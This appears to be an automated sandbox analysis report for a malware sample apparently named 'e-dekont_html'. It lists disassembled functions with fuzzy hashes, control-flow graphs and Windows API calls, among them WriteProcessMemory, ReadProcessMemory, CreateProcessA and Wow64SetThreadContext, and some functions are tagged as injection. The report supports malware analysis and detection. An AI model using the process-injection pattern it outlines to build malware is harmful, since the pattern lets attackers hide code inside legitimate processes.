                                                                                                                                                          • Source File: 00000000.00000002.1768343651.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_12b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                                          • Opcode ID: 9a0e5e333b8f302599cbe61600b93ba4ccbb783e9aac4b1402e272ca03842668
                                                                                                                                                          • Instruction ID: 4a6ff544426e2bffbd7c2c43c14b300b7ae0512a3207bd4bcffd14907e7b170a
                                                                                                                                                          • Opcode Fuzzy Hash: 9a0e5e333b8f302599cbe61600b93ba4ccbb783e9aac4b1402e272ca03842668
                                                                                                                                                          • Instruction Fuzzy Hash: 685175B09002498FDB18CFA9C988BEEBFF1EF88314F248559E419A73A0CB345944CF65
                                                                                                                                                          Function 012BD000 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1246 12bd000-12bd08f GetCurrentProcess 1250 12bd098-12bd0cc GetCurrentThread 1246->1250 1251 12bd091-12bd097 1246->1251 1252 12bd0ce-12bd0d4 1250->1252 1253 12bd0d5-12bd109 GetCurrentProcess 1250->1253 1251->1250 1252->1253 1255 12bd10b-12bd111 1253->1255 1256 12bd112-12bd12d call 12bd5d9 1253->1256 1255->1256 1259 12bd133-12bd162 GetCurrentThreadId 1256->1259 1260 12bd16b-12bd1cd 1259->1260 1261 12bd164-12bd16a 1259->1261 1261->1260
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 012BD07E
                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 012BD0BB
                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 012BD0F8
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 012BD151
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1768343651.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_12b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                                          • Opcode ID: 89f9e6d95d30be5d2d118ef34179200b98c9d0793769682997a5a8e9c2a63b46
                                                                                                                                                          • Instruction ID: c5dad34e1b23bc90b577e6f598db69383aedf439e3a8272b368ddd52f3305789
                                                                                                                                                          • Opcode Fuzzy Hash: 89f9e6d95d30be5d2d118ef34179200b98c9d0793769682997a5a8e9c2a63b46
                                                                                                                                                          • Instruction Fuzzy Hash: 075165B09102498FDB18CFA9C988BDEBFF1EF48314F208559E419A73A0DB345944CB65
                                                                                                                                                          Function 076B13C4 Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1399 76b13c4-76b1465 1402 76b149e-76b14be 1399->1402 1403 76b1467-76b1471 1399->1403 1410 76b14c0-76b14ca 1402->1410 1411 76b14f7-76b1526 1402->1411 1403->1402 1404 76b1473-76b1475 1403->1404 1405 76b1498-76b149b 1404->1405 1406 76b1477-76b1481 1404->1406 1405->1402 1408 76b1483 1406->1408 1409 76b1485-76b1494 1406->1409 1408->1409 1409->1409 1413 76b1496 1409->1413 1410->1411 1412 76b14cc-76b14ce 1410->1412 1419 76b1528-76b1532 1411->1419 1420 76b155f-76b1619 CreateProcessA 1411->1420 1414 76b14f1-76b14f4 1412->1414 1415 76b14d0-76b14da 1412->1415 1413->1405 1414->1411 1417 76b14de-76b14ed 1415->1417 1418 76b14dc 1415->1418 1417->1417 1421 76b14ef 1417->1421 1418->1417 1419->1420 1422 76b1534-76b1536 1419->1422 1431 76b161b-76b1621 1420->1431 1432 76b1622-76b16a8 1420->1432 1421->1414 1424 76b1559-76b155c 1422->1424 1425 76b1538-76b1542 1422->1425 1424->1420 1426 76b1546-76b1555 1425->1426 1427 76b1544 1425->1427 1426->1426 1429 76b1557 1426->1429 1427->1426 1429->1424 1431->1432 1442 76b16aa-76b16ae 1432->1442 1443 76b16b8-76b16bc 1432->1443 1442->1443 1444 76b16b0 1442->1444 1445 76b16be-76b16c2 1443->1445 1446 76b16cc-76b16d0 1443->1446 1444->1443 1445->1446 1447 76b16c4 1445->1447 1448 76b16d2-76b16d6 1446->1448 1449 76b16e0-76b16e4 1446->1449 1447->1446 1448->1449 1450 76b16d8 1448->1450 1451 76b16f6-76b16fd 1449->1451 1452 76b16e6-76b16ec 1449->1452 1450->1449 1453 76b16ff-76b170e 1451->1453 1454 76b1714 1451->1454 1452->1451 1453->1454 1456 76b1715 1454->1456 1456->1456
                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076B1606
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                          • Opcode ID: b68ed53aa28d4e52dd823b77239613e1549c9e9280990385ae643de2543bb3b4
                                                                                                                                                          • Instruction ID: 6f6beb5c8cc5fc1119dbeaee21c46efe58d136968ce10f729643d29d5099e52f
                                                                                                                                                          • Opcode Fuzzy Hash: b68ed53aa28d4e52dd823b77239613e1549c9e9280990385ae643de2543bb3b4
                                                                                                                                                          • Instruction Fuzzy Hash: E4A14DB1D0021EDFDF24CFA8C9917EDBBB2AF4A310F148169E819A7250E7749985CF91
                                                                                                                                                          Function 076B13D0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1457 76b13d0-76b1465 1459 76b149e-76b14be 1457->1459 1460 76b1467-76b1471 1457->1460 1467 76b14c0-76b14ca 1459->1467 1468 76b14f7-76b1526 1459->1468 1460->1459 1461 76b1473-76b1475 1460->1461 1462 76b1498-76b149b 1461->1462 1463 76b1477-76b1481 1461->1463 1462->1459 1465 76b1483 1463->1465 1466 76b1485-76b1494 1463->1466 1465->1466 1466->1466 1470 76b1496 1466->1470 1467->1468 1469 76b14cc-76b14ce 1467->1469 1476 76b1528-76b1532 1468->1476 1477 76b155f-76b1619 CreateProcessA 1468->1477 1471 76b14f1-76b14f4 1469->1471 1472 76b14d0-76b14da 1469->1472 1470->1462 1471->1468 1474 76b14de-76b14ed 1472->1474 1475 76b14dc 1472->1475 1474->1474 1478 76b14ef 1474->1478 1475->1474 1476->1477 1479 76b1534-76b1536 1476->1479 1488 76b161b-76b1621 1477->1488 1489 76b1622-76b16a8 1477->1489 1478->1471 1481 76b1559-76b155c 1479->1481 1482 76b1538-76b1542 1479->1482 1481->1477 1483 76b1546-76b1555 1482->1483 1484 76b1544 1482->1484 1483->1483 1486 76b1557 1483->1486 1484->1483 1486->1481 1488->1489 1499 76b16aa-76b16ae 1489->1499 1500 76b16b8-76b16bc 1489->1500 1499->1500 1501 76b16b0 1499->1501 1502 76b16be-76b16c2 1500->1502 1503 76b16cc-76b16d0 1500->1503 1501->1500 1502->1503 1504 76b16c4 1502->1504 1505 76b16d2-76b16d6 1503->1505 1506 76b16e0-76b16e4 1503->1506 1504->1503 1505->1506 1507 76b16d8 1505->1507 1508 76b16f6-76b16fd 1506->1508 1509 76b16e6-76b16ec 1506->1509 1507->1506 1510 76b16ff-76b170e 1508->1510 1511 76b1714 1508->1511 1509->1508 1510->1511 1513 76b1715 1511->1513 1513->1513
                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076B1606
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                          • Opcode ID: 4cea5b714a050136dde46c71af4e5a2cde0ed9d19f2c46127846e97dec03d7e9
                                                                                                                                                          • Instruction ID: 287dd8ab9bff4addc0c40dba2e9618c2b92e4c818a421e37237f6058e74ea20d
                                                                                                                                                          • Opcode Fuzzy Hash: 4cea5b714a050136dde46c71af4e5a2cde0ed9d19f2c46127846e97dec03d7e9
                                                                                                                                                          • Instruction Fuzzy Hash: 74914CB1D0021EDFDF24CF68C9517EDBBB2AF4A310F148169D819A7250E7749985CF91
                                                                                                                                                          Function 08F0F8B0 Relevance: 1.6, Strings: 1, Instructions: 369COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1514 8f0f8b0-8f0f8c7 1515 8f0f8d0-8f0f8d6 1514->1515 1516 8f0f8c9-8f0f8ce 1514->1516 1517 8f0f8d9-8f0f8dd 1515->1517 1516->1517 1518 8f0f8e6-8f0f8ec 1517->1518 1519 8f0f8df-8f0f8e4 1517->1519 1520 8f0f8ef-8f0f8f3 1518->1520 1519->1520 1521 8f0f8f5-8f0f912 1520->1521 1522 8f0f917-8f0f91b 1520->1522 1533 8f0fb37-8f0fb40 1521->1533 1523 8f0f91d-8f0f93a 1522->1523 1524 8f0f93f-8f0f94a 1522->1524 1523->1533 1526 8f0f952-8f0f958 1524->1526 1527 8f0f94c-8f0f94f 1524->1527 1528 8f0fb43-8f0fde6 1526->1528 1529 8f0f95e-8f0f96e 1526->1529 1527->1526 1536 8f0f970-8f0f98e 1529->1536 1537 8f0f993-8f0f9b8 1529->1537 1541 8f0faf7-8f0fafa 1536->1541 1544 8f0fb00-8f0fb05 1537->1544 1545 8f0f9be-8f0f9c7 1537->1545 1541->1544 1541->1545 1544->1528 1546 8f0fb07-8f0fb0a 1544->1546 1545->1528 1547 8f0f9cd-8f0f9e5 1545->1547 1550 8f0fb0c 1546->1550 1551 8f0fb0e-8f0fb11 1546->1551 1555 8f0f9f7-8f0fa0e 1547->1555 1556 8f0f9e7-8f0f9ec 1547->1556 1550->1533 1551->1528 1554 8f0fb13-8f0fb35 1551->1554 1554->1533 1564 8f0fa10 1555->1564 1565 8f0fa16-8f0fa20 1555->1565 1556->1528 1558 8f0f9f2-8f0f9f5 1556->1558 1558->1555 1560 8f0fa25-8f0fa2a 1558->1560 1560->1528 1566 8f0fa30-8f0fa3f 1560->1566 1564->1565 1565->1544 1571 8f0fa41 1566->1571 1572 8f0fa47-8f0fa57 1566->1572 1571->1572 1572->1528 1575 8f0fa5d-8f0fa60 1572->1575 1575->1528 1577 8f0fa66-8f0fa69 1575->1577 1578 8f0faba-8f0facc 1577->1578 1579 8f0fa6b-8f0fa6f 1577->1579 1578->1541 1586 8f0face-8f0fae3 1578->1586 1579->1528 1581 8f0fa75-8f0fa7b 1579->1581 1583 8f0fa8c-8f0fa92 1581->1583 1584 8f0fa7d-8f0fa83 1581->1584 1583->1528 1588 8f0fa98-8f0faa4 1583->1588 1584->1528 1587 8f0fa89 1584->1587 1593 8f0fae5 1586->1593 1594 8f0faeb-8f0faf5 1586->1594 1587->1583 1595 8f0faac-8f0fab8 1588->1595 1593->1594 1594->1544 1595->1578
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 4'fq
                                                                                                                                                          • API String ID: 0-2007657732
                                                                                                                                                          • Opcode ID: aecf80df307d97b19e1833c2d11166bb2efcd97f8e3002de8acbe3df55a4d6de
                                                                                                                                                          • Instruction ID: 39aaa2f64ed210055392baa58b42f564866312d6273bc09b295e17939e6bce5a
                                                                                                                                                          • Opcode Fuzzy Hash: aecf80df307d97b19e1833c2d11166bb2efcd97f8e3002de8acbe3df55a4d6de
                                                                                                                                                          • Instruction Fuzzy Hash: 80E13B74E00219DFCB05EBF8D994AAEBBB2EB88300F148059E505A7394DF35AD81EF51
                                                                                                                                                          Function 012B5A84 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1622 12b5a84-12b5a8f 1624 12b5b09-12b5b2b 1622->1624
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1768343651.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_12b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 04d13fb013c32dca2ea983e03f39f52d6478b0f4d36d84f507aa18647e44426c
                                                                                                                                                          • Instruction ID: 4ff3eb98f236123a8671e1ec0d184c17860915e2dd8f0a503f4ff93a1043fe63
                                                                                                                                                          • Opcode Fuzzy Hash: 04d13fb013c32dca2ea983e03f39f52d6478b0f4d36d84f507aa18647e44426c
                                                                                                                                                          • Instruction Fuzzy Hash: 7E41BFB1814749CFDF21CFA8C8856EEBBB0EF56364F14418AC545AF252C775A94ACF80
                                                                                                                                                          Function 012B44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1626 12b44b4-12b59d9 CreateActCtxA 1630 12b59db-12b59e1 1626->1630 1631 12b59e2-12b5a3c 1626->1631 1630->1631 1638 12b5a4b-12b5a4f 1631->1638 1639 12b5a3e-12b5a41 1631->1639 1640 12b5a51-12b5a5d 1638->1640 1641 12b5a60 1638->1641 1639->1638 1640->1641 1643 12b5a61 1641->1643 1643->1643
                                                                                                                                                          APIs
                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 012B59C9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1768343651.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_12b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Create
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                          • Opcode ID: 042c802834d697f80659eca01b58e98dc385734a271aae0daa8b1cb3b91aaa02
                                                                                                                                                          • Instruction ID: 98e1085890e37bc4dcc196ff2363c1de9349ddafe8c0d045468dcaaf8dda4f8f
                                                                                                                                                          • Opcode Fuzzy Hash: 042c802834d697f80659eca01b58e98dc385734a271aae0daa8b1cb3b91aaa02
                                                                                                                                                          • Instruction Fuzzy Hash: BF41DEB0C10719CBDB24DFAAC984BCEBBF5BF49304F20806AD509AB251DB756946CF90
                                                                                                                                                          Function 012B590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1644 12b590c-12b598c 1645 12b598f-12b59d9 CreateActCtxA 1644->1645 1647 12b59db-12b59e1 1645->1647 1648 12b59e2-12b5a3c 1645->1648 1647->1648 1655 12b5a4b-12b5a4f 1648->1655 1656 12b5a3e-12b5a41 1648->1656 1657 12b5a51-12b5a5d 1655->1657 1658 12b5a60 1655->1658 1656->1655 1657->1658 1660 12b5a61 1658->1660 1660->1660
                                                                                                                                                          APIs
                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 012B59C9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1768343651.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_12b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Create
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                          • Opcode ID: 013c506a91e1a78b58237e0c4d447809af1d383547b4a6d036977e70f939cd07
                                                                                                                                                          • Instruction ID: d543610ca5e63b9c6ccb477193d4c22364400a21f42272ece1842a3f8beda369
                                                                                                                                                          • Opcode Fuzzy Hash: 013c506a91e1a78b58237e0c4d447809af1d383547b4a6d036977e70f939cd07
                                                                                                                                                          • Instruction Fuzzy Hash: B741DEB0C00719CBDB25DFAAC984BCEBBF5BF49304F24806AD408AB251DB756946CF90
                                                                                                                                                          Function 076B1141 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1661 76b1141-76b1196 1664 76b1198-76b11a4 1661->1664 1665 76b11a6-76b11e5 WriteProcessMemory 1661->1665 1664->1665 1667 76b11ee-76b121e 1665->1667 1668 76b11e7-76b11ed 1665->1668 1668->1667
                                                                                                                                                          APIs
                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076B11D8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                          • Opcode ID: 071e5d6a751883cbf0571f7dfcfeda4705ea00cdaaacbc892769c7f753969397
                                                                                                                                                          • Instruction ID: 74ca06d90274606d6865b9c93723811e945eb81a41fe2995ec779dece1f801de
                                                                                                                                                          • Opcode Fuzzy Hash: 071e5d6a751883cbf0571f7dfcfeda4705ea00cdaaacbc892769c7f753969397
                                                                                                                                                          • Instruction Fuzzy Hash: 7E2139B590034ADFDB14CFA9C981BDEBBF5FF48320F10842AE519A7240C778A544DB60
                                                                                                                                                          Function 076B0B70 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1672 76b0b70-76b0bc3 1675 76b0bd3-76b0c03 Wow64SetThreadContext 1672->1675 1676 76b0bc5-76b0bd1 1672->1676 1678 76b0c0c-76b0c3c 1675->1678 1679 76b0c05-76b0c0b 1675->1679 1676->1675 1679->1678
                                                                                                                                                          APIs
                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076B0BF6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                          • Opcode ID: c022c76d6c0289b3eb7159fc2e879f794aac439e0cb64f1560787b19baf9465d
                                                                                                                                                          • Instruction ID: 7e88107d0dd2af7c44611da1beca21bde2ac4c25c25496fbccf83cd78285858e
                                                                                                                                                          • Opcode Fuzzy Hash: c022c76d6c0289b3eb7159fc2e879f794aac439e0cb64f1560787b19baf9465d
                                                                                                                                                          • Instruction Fuzzy Hash: A82148B59002098FDB20DFAAC485BEEFFF4AF49324F14842AD419A7341C7789545CFA1
                                                                                                                                                          Function 076B1148 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1683 76b1148-76b1196 1685 76b1198-76b11a4 1683->1685 1686 76b11a6-76b11e5 WriteProcessMemory 1683->1686 1685->1686 1688 76b11ee-76b121e 1686->1688 1689 76b11e7-76b11ed 1686->1689 1689->1688
                                                                                                                                                          APIs
                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076B11D8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                          • Opcode ID: c704bcb53c88d3918cefd060293cbc770ebb1360c5840ab4b0bd4ba5224a4b43
                                                                                                                                                          • Instruction ID: 3e5da9c00b03115cfd0bcb3e070c1aa45f63aed430dc1b2f1b501edbde5eac3b
                                                                                                                                                          • Opcode Fuzzy Hash: c704bcb53c88d3918cefd060293cbc770ebb1360c5840ab4b0bd4ba5224a4b43
                                                                                                                                                          • Instruction Fuzzy Hash: 082128B19003499FDB14CFA9C981BDEBBF5FF88320F108429E919A7340C7789544DB60
                                                                                                                                                          Function 076B1230 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1693 76b1230-76b12c5 ReadProcessMemory 1697 76b12ce-76b12fe 1693->1697 1698 76b12c7-76b12cd 1693->1698 1698->1697
                                                                                                                                                          APIs
                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076B12B8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1726664587-0
                                                                                                                                                          • Opcode ID: 4cba0d7c4c970f71baf70a00a09d83769fcfb5ea16760c28ecb0455d8d626c39
                                                                                                                                                          • Instruction ID: 75f654a5b88ba0d4af644967e231a3675b96d0a1414d17900f3c49f1b25cff61
                                                                                                                                                          • Opcode Fuzzy Hash: 4cba0d7c4c970f71baf70a00a09d83769fcfb5ea16760c28ecb0455d8d626c39
                                                                                                                                                          • Instruction Fuzzy Hash: CC2125B19002499FDB10CFAAC881AEEFBF5FF48320F10842AE519A7240C778A541DBA1
                                                                                                                                                          Function 012BD64A Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012BD6D7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1768343651.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_12b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                          • Opcode ID: f77cb8c851df8cef6836f3e31be1feb8718e78cd08764788fbc4c65a92074455
                                                                                                                                                          • Instruction ID: 787a4eec6496f36d60da5ed1435299598ac9fafaaa2c7e11269b295fb250830e
                                                                                                                                                          • Opcode Fuzzy Hash: f77cb8c851df8cef6836f3e31be1feb8718e78cd08764788fbc4c65a92074455
                                                                                                                                                          • Instruction Fuzzy Hash: 1321E4B5D002499FDB10CFAAE585AEEFFF5EB58324F14801AE918A7350C378A944CF60
                                                                                                                                                          Function 076B0B78 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076B0BF6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                          • Opcode ID: 2477e35d1cdc8e6e6d1cdbaef39fb9331c6b320587c0ff0ba30a6e4141f0b861
                                                                                                                                                          • Instruction ID: 880ac70d36436bcb183b5b391dc8d5d8ba6a06acc2fe6fb35e4b444185671f29
                                                                                                                                                          • Opcode Fuzzy Hash: 2477e35d1cdc8e6e6d1cdbaef39fb9331c6b320587c0ff0ba30a6e4141f0b861
                                                                                                                                                          • Instruction Fuzzy Hash: 402107B19002098FDB20DFAAC5857EEBFF4AF49324F14842AD519A7341D778A945CFA1
                                                                                                                                                          Function 076B1238 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076B12B8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1726664587-0
                                                                                                                                                          • Opcode ID: bb0897f882e34a3e05fd0907178d3769fb74c5bae003f1501191ba20ff68f078
                                                                                                                                                          • Instruction ID: 9218412d1c3b46ab9dcd47cdeb82734e63e6a2e873979d0d6042f75b0b15eaec
                                                                                                                                                          • Opcode Fuzzy Hash: bb0897f882e34a3e05fd0907178d3769fb74c5bae003f1501191ba20ff68f078
                                                                                                                                                          • Instruction Fuzzy Hash: 332128B19003499FDB10DFAAC881ADEFBF5FF48320F10842AE519A7240C7789540DBA1
                                                                                                                                                          Function 012BD650 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012BD6D7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1768343651.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_12b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                          • Opcode ID: ad4c529060eaa667fee077886a85b2a225a6ecd2d1aaa9c60951f165ca4f1ef4
                                                                                                                                                          • Instruction ID: 004b94d22e8c0aaf5d544507de18b6eb6167a35ff123acb58ef77ee1b1e47399
                                                                                                                                                          • Opcode Fuzzy Hash: ad4c529060eaa667fee077886a85b2a225a6ecd2d1aaa9c60951f165ca4f1ef4
